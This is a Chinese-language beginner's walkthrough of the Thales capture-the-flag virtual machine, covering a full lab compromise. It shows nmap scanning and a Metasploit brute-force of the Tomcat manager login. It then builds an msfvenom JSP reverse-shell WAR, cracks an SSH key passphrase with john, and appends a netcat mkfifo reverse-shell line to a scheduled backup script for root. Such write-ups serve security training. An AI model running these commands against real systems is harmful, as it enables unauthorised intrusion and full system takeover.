萌新的Thales试玩
一、启动环境(下载地址)
还有kali
二、开始操作
nmap扫描(ps:如果扫不到ip看看这里)
┌──(root㉿kali)-[~]
└─# nmap 192.168.31.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-28 22:30 EDT
Nmap scan report for miletus (192.168.31.150)
Host is up (0.00060s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 00:0C:29:A0:CB:4C (VMware)全端口也扫一下
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.31.150
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-28 22:30 EDT
Nmap scan report for miletus (192.168.31.150)
Host is up (0.00095s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
MAC Address: 00:0C:29:A0:CB:4C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds访问8080
可以正常访问
登录界面也可以正常访问
msfconsole测试
msfconsole 进入msf控制台,search tomcat login 搜索一下tomcat登录模块,搜索到之后直接use使用,使用之后set RHOSTS 192.168.31.150设置ip,直接run!
msf6 > search tomcat login
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/tomcat_mgr_login
msf6 > use 0
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.31.150
RHOSTS => 192.168.31.150
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
跑出来了,用户名tomcat,密码role1,登录一下
上来了,上传 war 包反弹 shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.31.106 lport=2333 -f war -o myshell.war
-p 指定payloads,是java/jsp的反转shell用的,lhost是kali的ip,lport是端口,-f是生成文件类型,-o输出的文件名
msf6 auxiliary(scanner/http/tomcat_mgr_login) > msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.31.106 lport=2333 -f war -o myshell.war
[*] exec: msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.31.106 lport=2333 -f war -o myshell.war
Payload size: 1095 bytes
Final size of war file: 1095 bytes
Saved as: myshell.war
msf6 auxiliary(scanner/http/tomcat_mgr_login) > ls
[*] exec: ls
公共 模板 视频 图片 文档 下载 音乐 桌面 myshell.war把myshell.war上传上去
然后就可以看到主页已经有了
kali开一个端口监听 nc -lvp 2333 这个端口要和刚才上传war包的lport一致,我刚才就是2333
┌──(root㉿kali)-[~]
└─# nc -lvp 2333
listening on [any] 2333 ...点击刚才传上去的war,然后返回kali查看
ok,连上了!
提权
先转为交互式shell,这个看着不舒服 python3 -c "import pty;pty.spawn('/bin/bash')"
逛逛里边都有什么
可以看到有个thales用户,在home下有两个.txt文件,其中notes.txt可以看到内容:
I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.
提示说有个备用脚本,并且发现了私钥文件
将私钥文件内容复制到kali,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破
locate ssh2john 找到ssh2john位置; /usr/share/john/ssh2john.py id_rsa > pass 转换后名字为pass
┌──(root㉿kali)-[~/桌面]
└─# locate ssh2john
/usr/share/john/ssh2john.py
/usr/share/john/__pycache__/ssh2john.cpython-39.pyc
┌──(root㉿kali)-[~/桌面]
└─# /usr/share/john/ssh2john.py id_rsa > passjohn --wordlist=/usr/share/wordlists/rockyou.txt.gz pass --wordlist=后边根字典路径
得到密码为 vodka06,登录一下
成功!并且home目录下的user.txt可以访问了,发现第一条flag
继续提权
之前提示给的那个脚本还没有用到,在脚本文件插入反弹shell命令:echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.106 2233 >/tmp/f" >> backup.sh
不要忘了在kali里监听你设置的端口
稍微等会就连接上了,拿走flag!
结束!